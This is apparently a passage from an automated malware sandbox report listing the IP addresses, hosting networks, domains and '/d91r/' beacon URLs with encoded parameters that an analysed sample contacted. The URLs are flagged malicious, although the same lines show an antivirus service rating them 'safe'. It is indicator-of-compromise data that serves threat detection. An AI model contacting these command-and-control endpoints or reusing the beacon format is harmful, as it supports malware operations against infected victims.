 www.buymyenergy.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true
199.192.26.35
 www.dexmart.xyz United States
22612 NAMECHEAP-NETUS true
217.160.0.217
 www.solya-shop.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
154.215.156.6
 bb.zhanghonghong.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true
34.117.168.233
 td-ccm-168-233.wixdns.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG true
81.17.18.196
 www.brightfms.com Switzerland
51852 PLI-ASCH true
23.83.160.9
 www.aznqmd.com United States
7203 LEASEWEB-USA-SFO-12US true
162.240.73.101
 www.wittofitentertainment.com United States
46606 UNIFIEDLAYER-AS-1US false
208.91.197.91
 www.funvacayflorida.com Virgin Islands (BRITISH)
40034 CONFLUENCE-NETWORK-INCVG true
81.17.29.148
 www.texasgent.com Switzerland
51852 PLI-ASCH true
88.212.206.251
 www.interactive-media.ru Russian Federation
39134 UNITEDNETRU true
2.57.90.16
 eta-trader.net Lithuania
47583 AS-HOSTINGERLT true
172.67.212.220
 www.maxhaidt.com United States
13335 CLOUDFLARENETUS true
198.58.118.167
 www.cardinialethanol.com United States
63949 LINODE-APLinodeLLCUS true

Contacted Domains

Name IP Active
www.buymyenergy.com 45.194.145.38 true
www.cardinialethanol.com 198.58.118.167 true
td-ccm-168-233.wixdns.net 34.117.168.233 true
eta-trader.net 2.57.90.16 true
bb.zhanghonghong.com 154.215.156.6 true
www.solya-shop.com 217.160.0.217 true
www.funvacayflorida.com 208.91.197.91 true
www.aznqmd.com 23.83.160.9 true
www.b-tek.media 91.184.0.24 true
www.dexmart.xyz 199.192.26.35 true
www.texasgent.com 81.17.29.148 true
www.maxhaidt.com 172.67.212.220 true
www.wittofitentertainment.com 162.240.73.101 true
flaviosilva.online 2.57.90.16 true
www.interactive-media.ru 88.212.206.251 true
www.brightfms.com 81.17.18.196 true
www.flaviosilva.online unknown unknown
www.184411.com unknown unknown
www.eta-trader.net unknown unknown
www.finelinetackdirect.com unknown unknown
www.ghostdyes.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.solya-shop.com/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.dexmart.xyz/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.184411.com/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.b-tek.media/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.184411.com/d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn true
  • Avira URL Cloud: safe
 unknown
http://www.maxhaidt.com/d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn true
  • Avira URL Cloud: safe
 unknown
http://www.ghostdyes.net/d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn true
  • Avira URL Cloud: safe
 unknown
http://www.ghostdyes.net/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.funvacayflorida.com/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.texasgent.com/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.interactive-media.ru/d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn true
  • Avira URL Cloud: safe
 unknown
http://www.dexmart.xyz/d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn true
  • Avira URL Cloud: safe
 unknown
http://www.cardinialethanol.com/d91r/ true
  • Avira URL Cloud: safe
 unknown
http://www.flaviosilva.online/d91r/ true
  • Avira URL Cloud: safe
 unknown